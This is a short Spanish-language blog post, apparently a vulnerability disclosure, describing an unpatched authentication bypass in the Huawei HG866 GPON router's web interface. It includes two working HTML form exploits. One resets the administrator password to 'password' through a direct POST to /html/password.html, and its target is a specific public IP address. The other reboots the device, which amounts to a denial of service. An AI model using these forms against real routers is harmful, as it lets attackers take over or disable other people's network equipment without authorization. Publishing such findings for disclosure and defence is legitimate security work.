Evasión de autenticación en Huawei HG866

Equipment ID: EchoLife:HG866
Hardware Version: HG866GTA_VER.C, 01, 02
Software Version: V1R2C01SPC202, R3.2.4.92sbn – R3.4.2.257sbn, 3FE53864AOCB16
Severidad: Alta
Impacto: Evasión de autenticación
Vector de ataque: Remoto
Solución: Sin solución
Referencia: CVE no disponible

El router Huawei HG866 cuenta con interfaz de administración de red vía web, puertos 4FE+2POTS+WIFI+2USB, interfaz óptica GPON, SC/APC.

La interfaz de administración web posee páginas vulnerables a falta de validación de sesión, lo que permite la evasión de autenticación de manera local y remota.

Es posible evadir la autenticación y modificar la contraseña de administrador haciendo una petición directamente a la URL: /html/password.html utilizando el método POST.

<!--Cambia el password de root por password --!>
<form name=hg866bypass action=http://187.162.144.50/html/password.html method=post >
<input name=psw value=password ><input name=reenterpsw value=password >
<input type="submit" name="save" value="Apply" />
</form>

<!--Reinicia el dispositivo --!>
<form name=hg866dos action=http://192.168.100.251/html/admin_reboot.html" method="post">
<input type=submit name=save id=save value=Reboot />
</form>

 


hkm

Share
Esta entrada fue publicada en Exploits, Vulnerabilidades. Guarda el enlace permanente.

Deja un comentario